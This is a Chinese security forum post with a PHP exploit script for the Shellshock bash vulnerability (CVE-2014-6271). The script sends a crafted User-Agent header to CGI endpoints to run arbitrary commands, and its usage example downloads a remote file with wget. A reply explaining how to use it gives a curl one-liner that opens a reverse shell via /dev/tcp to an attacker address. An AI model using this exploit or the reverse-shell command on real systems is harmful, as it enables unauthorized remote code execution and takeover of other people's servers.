<?php /* Title: Bash Specially-crafted Environment Variables Code Injection Vulnerability CVE: 2014-6271 Vendor Homepage: [url]http://www.gnu.org/software/bash/[/url] Author: Prakhar Prasad && Subho Halder Author Homepage: [url]http://prakharprasad.com[/url] && [url]http://appknox.com[/url] Date: September 25th 2014 Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26 GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13) Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget [url]http://appknox.com[/url] -O /tmp/shit" Reference: [url]http://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/[/url] Test CGI Code : #!/bin/bash echo "Content-type: text/html" echo "" echo "Bash-is-Vulnerable" */ error_reporting(0); if(!defined('STDIN')) die("Please run it through command-line!\n"); $x = getopt("u:c:"); if(!isset($x['u']) || !isset($x['c'])) { die("Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmd\n"); } $url = $x['u']; $cmd = $x['c']; $context = stream_context_create( array( 'http' => array( 'method' => 'GET', 'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"' ) ) ); if(!file_get_contents($url, false, $context) && strpos($http_response_header[0],"500") > 0) die("Command sent to the server!\n"); else die("Connection Error\n"); ?>
查看全部评分
使用道具 举报
ansbase 发表于 2014-9-26 08:17 Please Tell Us,How to use it?
curl [url]http://xxx.xxx.xxx.xxx/cgi-bin/vulnerable[/url] -A "() { :;}; /bin/sh -i >& /dev/tcp/REVERSE_SHELL_IP/PORT 0>&1"
本版积分规则 发表回复 回帖并转播 回帖后跳转到最后一页
江苏省公安厅
江苏省通信管理局
浙江省台州刑侦支队
DEFCON GROUP 86025
邮箱系统
应急响应中心
红盟安全
官方QQ群:112851260
官方邮箱:security#ihonker.org(#改成@)
官方核心成员
Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )
GMT+8, 2026-1-11 06:15 , Processed in 0.037717 second(s), 29 queries , Gzip On, MemCache On.
Powered by ihonker.com
Copyright © 2015-现在.
发表于 2014-9-25 15:20:57
发表于 2014-9-25 15:34:20
